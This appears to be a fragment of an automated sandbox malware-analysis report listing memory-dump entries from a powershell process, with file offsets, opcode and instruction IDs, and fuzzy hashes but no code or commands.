                • Source File: 00000005.00000002.1443435550.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5040000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dadd3f41a884268e71160f88d3972f4c5e804cfc6223b0ad9b01405030000f0d
                • Instruction ID: fd5c558e5201a8698d9e02c030ae660bd80d2d7163f71f4a0787455f4515e694
                • Opcode Fuzzy Hash: dadd3f41a884268e71160f88d3972f4c5e804cfc6223b0ad9b01405030000f0d
                • Instruction Fuzzy Hash: E2A17CB4A002069FCB15CF59D494AAEFBB1FF89310B2485A9E815AB365C735FC51CFA0
                Memory Dump Source
                • Source File: 00000005.00000002.1443435550.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5040000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62a201bcdec9b84e5884c559608c560c7e43ed20526f2321802746ebd155ce6a
                • Instruction ID: 98497a3ea60567d15424bbbbbf7aaa0630f5a00dcebde5d27738b70c0ae73b6d
                • Opcode Fuzzy Hash: 62a201bcdec9b84e5884c559608c560c7e43ed20526f2321802746ebd155ce6a
                • Instruction Fuzzy Hash: 4E4116B4A0060A9FCB05CF58D598AAEF7B1FF48314B1181A9D815AB364C736FC91CFA4
                Memory Dump Source
                • Source File: 00000005.00000002.1443435550.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5040000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e70a09341883a65349b98ef3242fc29615da15bad196ed6471eac3732a18ab72
                • Instruction ID: 6d4e3a0f7b53a5cd022eeaca6f7fdd14fab576aa801576c7a9d60db7063dcbf8
                • Opcode Fuzzy Hash: e70a09341883a65349b98ef3242fc29615da15bad196ed6471eac3732a18ab72
                • Instruction Fuzzy Hash: C52130B4A046099FCB04CF59C8809AEFBB1FF89310B1585A5D819E7751C735EC45CFA0
                Memory Dump Source
                • Source File: 00000005.00000002.1443435550.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5040000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c0c61f681ca16c437a7894b57d491b70236c7b39ac24bd334a0b99ca41b25d7
                • Instruction ID: 2c667bb0441fe5353eda681fea72fce0ccbc0c7377fbd674d90a9d3a11874fc7
                • Opcode Fuzzy Hash: 6c0c61f681ca16c437a7894b57d491b70236c7b39ac24bd334a0b99ca41b25d7
                • Instruction Fuzzy Hash: 7E210A74A006099FCB04CF89D8849AAFBB1FF89310B1585A9D809E7361C735EC91CFA0
                Memory Dump Source
                • Source File: 00000005.00000002.1443019210.0000000004B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B6D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_4b6d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3dd7c57fba2aa6848577ec01b10743aa77751787bfa36668715662856d178175
                • Instruction ID: 006de140ace0d5f40a02217e6a3034b6f8016f5cd49a431176ee42efa89c4217
                • Opcode Fuzzy Hash: 3dd7c57fba2aa6848577ec01b10743aa77751787bfa36668715662856d178175
                • Instruction Fuzzy Hash: 4B019E7250D3C09FD7124B219C94752BFA8DF43624F1980DBE9898F1A3C26DAC45CB72
                Memory Dump Source
                • Source File: 00000005.00000002.1443019210.0000000004B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B6D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_4b6d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a5493b9bb21c0ff6f0d04ed3b45f9844d70f4e61a9f63e540e8bf7943a4f87c0
                • Instruction ID: 245b3ab5bd40801ae9c01c8ad73b519f5d6c33bb369da9ca1e3831359ed78408
                • Opcode Fuzzy Hash: a5493b9bb21c0ff6f0d04ed3b45f9844d70f4e61a9f63e540e8bf7943a4f87c0
                • Instruction Fuzzy Hash: 3B01F7716043449BE7204E31DC80B67BF9CDF81625F18C49ADD0A4B142C27DA841C7B1